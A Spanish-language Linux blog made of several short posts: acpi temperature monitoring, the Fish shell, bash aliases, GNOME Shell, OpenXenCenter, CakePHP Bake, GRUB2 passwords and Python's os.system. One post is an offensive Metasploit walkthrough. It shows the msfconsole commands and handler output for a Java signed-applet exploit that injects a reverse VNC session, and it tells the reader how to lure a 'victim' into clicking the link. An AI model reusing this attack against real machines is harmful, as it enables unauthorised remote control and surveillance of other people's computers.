Rincón Informático

Desde hace dias estoy teniendo algunos problemas de temperatura en  mi laptop,  la ultima vez, estaba compilando el kernel para instalar el NCTUNS, pero de un momento a otro el ordenador se apago. Revisando los LOGS, me lleve una gran sorpresa, al descubrir que el apagon fue como consecuencia de la alta temperatura que tenia mi CPU, alrededor de 85 C°.

Nuevamente necesitaba  compilar el kernel, pero para que no volviera apagarse necesitaba monitorear constantemente  la temperatura del procesador.  En lo primero que  pense fue en ACPI,   esta aplicacion,  nos permite realizar este proposito, monitorear la temperatura y la bateria de nuestro equipo.

Para instalar podemos hacer uso del gestor de paquetes:

apt-get install acpi

Su funcionamiento es bastante sencillo

acpi

Te mostrara la informacion basica de la bateria, es decir el porcentaje de carga de la misma

si deseamos mas informacion:

acpi  -V

Nos mostrara mucha mas informacion.

Ahora si lo deseamos es  que nos muestre la informacion en tiempo real, podemos hacer uso del paquete watch

watch acpi -V

De esta forma podremos ver toda la informacion en tiempo real, de esta manera es posible monitorear  cada instante y ver los cambios de temperatura que la CPU tiene.

Esta semana,  en la universidad se puso la tarea de investigar acerca de las diferentes shell que existian, en mi caso ya conocia algunas e incluso hace algun tiempo, escribi un articulo sobre que era una shell y algunas de ellas. Sin embargo debatiando con algunos amigos Linuxeros, sobre cual era la mejor shell, llegamos a una shell no tan conocida llamada Fish.  Segun la pagina oficial FISH es:

Fish es un  intérprete de comandos interactivo. Fish destina al usuario una  shell de línea de comandos amigable sobre todo para uso interactivo.

Fish tiene algunas caracteristicas importantes como:

• Los parametros de colores vienen activados por defecto.
• Resaltado de sintaxis
• Permite de manera rapida buscar comandos en el history
• Autocompletado interactivo, incluso con la descripcion de cada parametro
• Pagina de ayuda, interactiva y amistosa
• Permite abrir un archivo con   la apliacion que el escritorio tenga por defecto.
• Creacion de funciones.
• Y mucho mas

La instalacion es muy sencilla:

apt-get install fish

Ahora lo que debemos hacer es editar el archivo /etc/passwd y alli ubicamos al usuario que deseemos que use la shell fish  y donde diga /bin/bash/ borramos y ponemos /usr/bin/fish

visitante:x:1002:1003:visitante,,,:/home/visitante:/usr/bin/fish

Ahora veamos algunas imagenes de como funciona

Para abrir cualquier documento o archivo desde la consola, podemos hacerlo de esta forma:

open imagen.jpg

Asi  la imagen se abrira con la aplicacion que el escritorio tenga por defecto para abrir este tipo de arhivos.

En conclusion, podemos decir que esta shell es perfecta para todos aquellos que desean una mayor interaccion entre la shell y el usuario.  Una shell muy interesante  y lo mejor de todo es que totalmente compatible con bash, es decir,  si sabes manejar bash, te podras defender a la perfeccion en fish. Espero la prueben y me comenten sus opiniones

Los alias son comandos personalizados que se crean apartir de otros comandos mas generales, es decir, con los alias nos podemos ahorrar el esfuerzo de escribir un comando demasiado largo (incluyendo los parametros), cambiandolo por uno mucho mas corto. Esto se utiliza generalmente en operaciones y acciones que se suelen  repetir con determinada frecuencia, las cuales son demasiadas largas, un ejemplo cuando nos conectamos por ssh a un servidor  con determinada IP y puerto. Sin embargo,  una definicion mas formal:

En informática alias es una orden disponible en varios intérpretes de comandos tales como los shells de Unix, 4DOS/4NT y Windows PowerShell, que permite reemplazar una palabra o serie de palabras con otra. Su uso principal es el de abreviar órdenes o para añadir argumentos de forma predeterminada a una orden que se usa con mucha frecuencia. Los alias se mantienen hasta que se termina la sesión en la terminal, pero normalmente se suelen añadir en el fichero de configuración del intérprete de órdenes (~/.cshrc o /etc/csh.cshrc (aplicado a todo el sistema) para csh, o ~/.bashrc o si quieres aplicarlo a todo el sistema /etc/bashrc o /etc/bash.bashrc para bash) de forma que siempre están disponibles para todas las sesiones de terminal.

Como bien lo dice  la definicion, existen dos formas  para crear un alias:

1. Alias temporal:  Solo funciona hasta que se cierre la terminal. Para crearlo es muy sencillo, la sintaxis debe ser: alias nombre=’comando’

Si quisieramos crear un alias para conectarnos al servidorA hariamos lo siguiente:

alias servidorA=’ssh usuario@127.0.0.1 -p 22′

Ahora lo ejecutamos:



De esta forma, quedaria nuestro alias creado, pero cuando la consola fuera cerrada, el alias desapareceria.

2. Sin embargo podemos crear los alias de forma permantente para cualquier usuario,  para esto la sintaxis es igual, lo unico que debemos hacer es agregar el comando en el .bashrc  del usuario y agregar al alias:

nano /home/usuario/.bashrc y agregamos el alias

alias servidorA=’ssh usuario@127.0.0.1 -p 22′

Guardamos,  y listo solo nos queda probar el alias

De esta forma quedara listo nuestro alias.

Los alias son muy utiles para aquellos SySAdmin que diariamente tiene que administrar diferentes tipos de servidores, y realizar las mismas tareas en cada uno de ellos.

En esta ocasion, se mostrara como de manera facil  y usando el Metasploit Framework  inyectaremos un servidor VNC en una maquina remota para poder visualizar el escritorio de la victima y hacer lo que deseemos.

Antes de entrar en materia debemos tener en cuenta que  el exito del exploit depende de varios factores  entre ellos tenemos:

• Antivirus de la maquina victima -> He hecho algunas pruebas y  el NOD32 detecta  el archivo como un troyano.
• JAVA -> Es necesario que la victima tenga instalado JAVA instalado
• Que la victima acepte el certificado.
• Un poco de suerte.

Para empezar debemos actualizar nuestro Metasploit:

msfupdate

El siguiente paso es correr la consola del metasploit:

msfconsole

Ahora seleccionamos el exploit  y asignamos los parametros necesarios:

use exploit/multi/browser/java_signed_applet
set payload windows/vncinject/reverse_tcp
set lhost 192.168.100.1 -> Ip local
lhost => 192.168.1.100
exploit

A continuacion debe salir algo como esto:

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8080/dTkaem
[*]  Local IP: http://192.168.1.100:8080/dTkaem
[*] Server started.

El siguiente paso es hacer que nuestra victima haga click en el enlace malioso que el exploit a creado:

http://192.168.1.100:8080/dTkaem

Hay que tener en cuenta que esta es una direccion privada y que asi solo funcionara si nuestra victima esta en la misma red LAN. Si se desea hacer a traves de Internet se debe cambiar el enlace por la IP publica y asegurarse que  no haya algun dispositivo como router, firewall o demas que impidan el paso hacia el puerto 8080
Cuando la Victima haga click en el  enlace aparecera una advertencia como esta:

Si nuestra victima ejecuta la aplicacion, inmediatamente se nos abrira la pantalla del escritorio remoto donde podremos  ver lo que hace la victima en ese momento,   y hacer lo que nosotros queramos.

Cada vez esta mas cerca el lanzamiento de Gnome-3, una version que muy posiblemente causara una muy buena impresion y dara mucho de que hablar, asi como lo hizo KDE en su momento con KDE4.

Sin embargo ya se encuentra en los repositorios de la version testing de Debian (squeeze), algunas aplicaciones de esta nueva version las cuales nos pueden dar una idea  de  lo agradable y funcional que sera GNOME-3. Una de estas aplicaciones es GNOME-SHELL, segun el propio proyecto GNOME, GNOME-SHELL es:

GNOME Shell es la tecnología que define la experiencia de usuario GNOME 3 de escritorio. Proporciona las funciones básicas de la interfaz como el cambio de ventanas y el lanzamiento de aplicaciones. GNOME Shell se aprovecha de las capacidades del hardware de gráficos modernos e introduce conceptos innovadores de interfaz de usuario para proporcionar un agradable y fácil de usar la experiencia.

Para instalarlo debemos hacerlo desde los repositorios:

apt-get install gnome-shell

Ahora que ya lo tenemos instalado lo ejecutamos de esta forma, en una consola como un usuario normal escribimos:

gnome-shell –replace

y listo tendremos a gnome-shell funcionando, algunos pantallazos.

Para volver al antiguo gnome solo basta con  presionar alt +f2 y escribir lo siguiente:

debugexit

Si por alguna razon las ventanas se quedan sin barras debemos poner en una consola:

metacity –replace

y nuevamente tendremos nuestro escritorio como antes.

Para todas aquellas personas que estan esperando con ansias  el lanzamiento de GNOME-3 esta es una buena alternativa, ir mirando poco a poco las nuevas aplicaciones de esta nueva version.

Para aquellas personas que le tienen temor a la consola o simplemente les parece complicado configurar y administrar servidores XEN a traves de la misma, se ha desarrollado una aplicacion llamada OpenXenCenter la cual es una version libre del programa XenCenter el cual funciona solo bajo Windows. ¿Que es OpenXenCenter?

OpenXenCenter es un clon de Citrix XenCenter. OpenXenCenter está escrito en python con pygtk y una versión modificada de gtk-vnc. Puede controlar sus máquinas virtuales, acceso a la máquina consolas virtuales, permite realizar las operaciones (iniciar, detener, suspender, reiniciar …), crear máquinas virtuales, y mucho más.

Para descargar el programa podemos ir a este link

Ahora para ejecutarlo necesitamos tener algunas dependencias:

• Python
• pygtk
• python-gtk-vnc

Despues de instalar estos paquetes a traves de tu gestor de paquetes, solo basta descargar el archivo, descomprimirlo  y desde una consola hacemos lo siguiente:

cd openxencenter // Nos ubicamos en la carpeta de la aplicacion (donde extraimos el paquete)
python window.py // ejecutamos la aplicacion

open xencenter, servidor xen

Con esto tendremos nuestro open xen center funcionando y listo para administrar nuestras maquinas virtuales, desde alli podremos crear, modificar, eliminar maquinas virtuales, tener acceso a cada una de ellas y muchas cosas mas.

He querido compartir con ustedes este videotutorial que he creado, para mostrar una magnifica herramienta de CakePhp que se usa desde consola llamada Bake, y que nos facilita enormemente el desarrollo de nuestras aplicaciones con este framework.

En este videotutorial desarrollaremos una aplicación web, de forma muy rápida y lo mejor; y que aún me sorprende sin escribir ni una sola línea de código . Bueno esto debido a que CakePhp se ha creado con los principios de Ruby On Rails.

Anteriormete había dedicado una entrada a la instalación de CakePhp acá.

Que necesitamos?

- Servidor web (Apache)

- Php5

- php5-cli

Para seguir este videotutorial es necesario tener algunos conceptos claros:

- Patrón de diseño MVC (Modelo – Vista – Controlador)

- Conceptos básicos sobre bases de datos

- Algunos comandos de Gnu/Linux

Formato .ogg – Tamaño (109.84 MB) – Descargar

Saludos! Hasta la próxima.

Bueno en esta oportunidad quiero compartir con ustedes este pequeño truquito para asegurar aun mas nuestro maquina, que consiste en colocarle una clave a nuestro Grub2. bueno sin más carreta aqui vamos.

lo primero que debemos hacer es abrir nuestra consola en modo root y escribimos:

#grub-mkpasswd-pbkdf2

alli deberemos  de escribir el password para nuestro Grub2 y este nos generará un hash. La salida del comando es esta:

Ahora escribimos esto otro en la consola

#vim /boot/grub/grub.cfg

Agregamos esto en la parte inicial del archivo

la parte donde dice grub.pbkdf2……. es lo que se genera en la parte anterior

ahora solo queda agregar esto otro –users fortress en la siguiente parte:

Ahora solo queda que guardes, reinicies y listo tu Grub2 ya  tiene password

Cabe decir que puedes crear usuarios y password para cada entrada en el Grub2. Bueno espero y les sea de utilidad, y hasta la proxima.

Fuente

Hay ocasiones en las cuales necesitamos hacer uso de los comandos de nuestra amada  y querida shell desde algún programa que estemos desarrollando en Python, gracias a la facilidad de la serpiente (una de sus grandes características) podemos hacer esto de forma muy sencilla.  A continuación un ejemplo:

Creamos un archivo llamado prueba.py con el siguiente contenido:

#!/usr/bin/python
import os

os.system(“uname -a”)

Importamos el modulo OS y hacemos uso de la funcion system, la cual nos permite ejecutar un comando de la consola. sobra decir que en el ejemplo basta reemplazar el comando “uname -a” por el  que nosotros deseemos. Ahora ejecutamos el archivo *.py   de esta forma:

python prueba.py

y el resultado sera:

Como pueden ver es verdaderamente fácil ejecutar comandos del sistema operativo en lenguaje python, esto es importante ya que podemos ejecutar cualquier comando e incluso llamar a un script en bash o lo que se nos ocurra. Antes de terminar quiero aclarar que no soy muy experto en el tema, muy seguramente habrá formas mas sencillas, correctas y potentes para realizar este tipo de cosas, espero que les haya parecido interesante y no duden en comentar.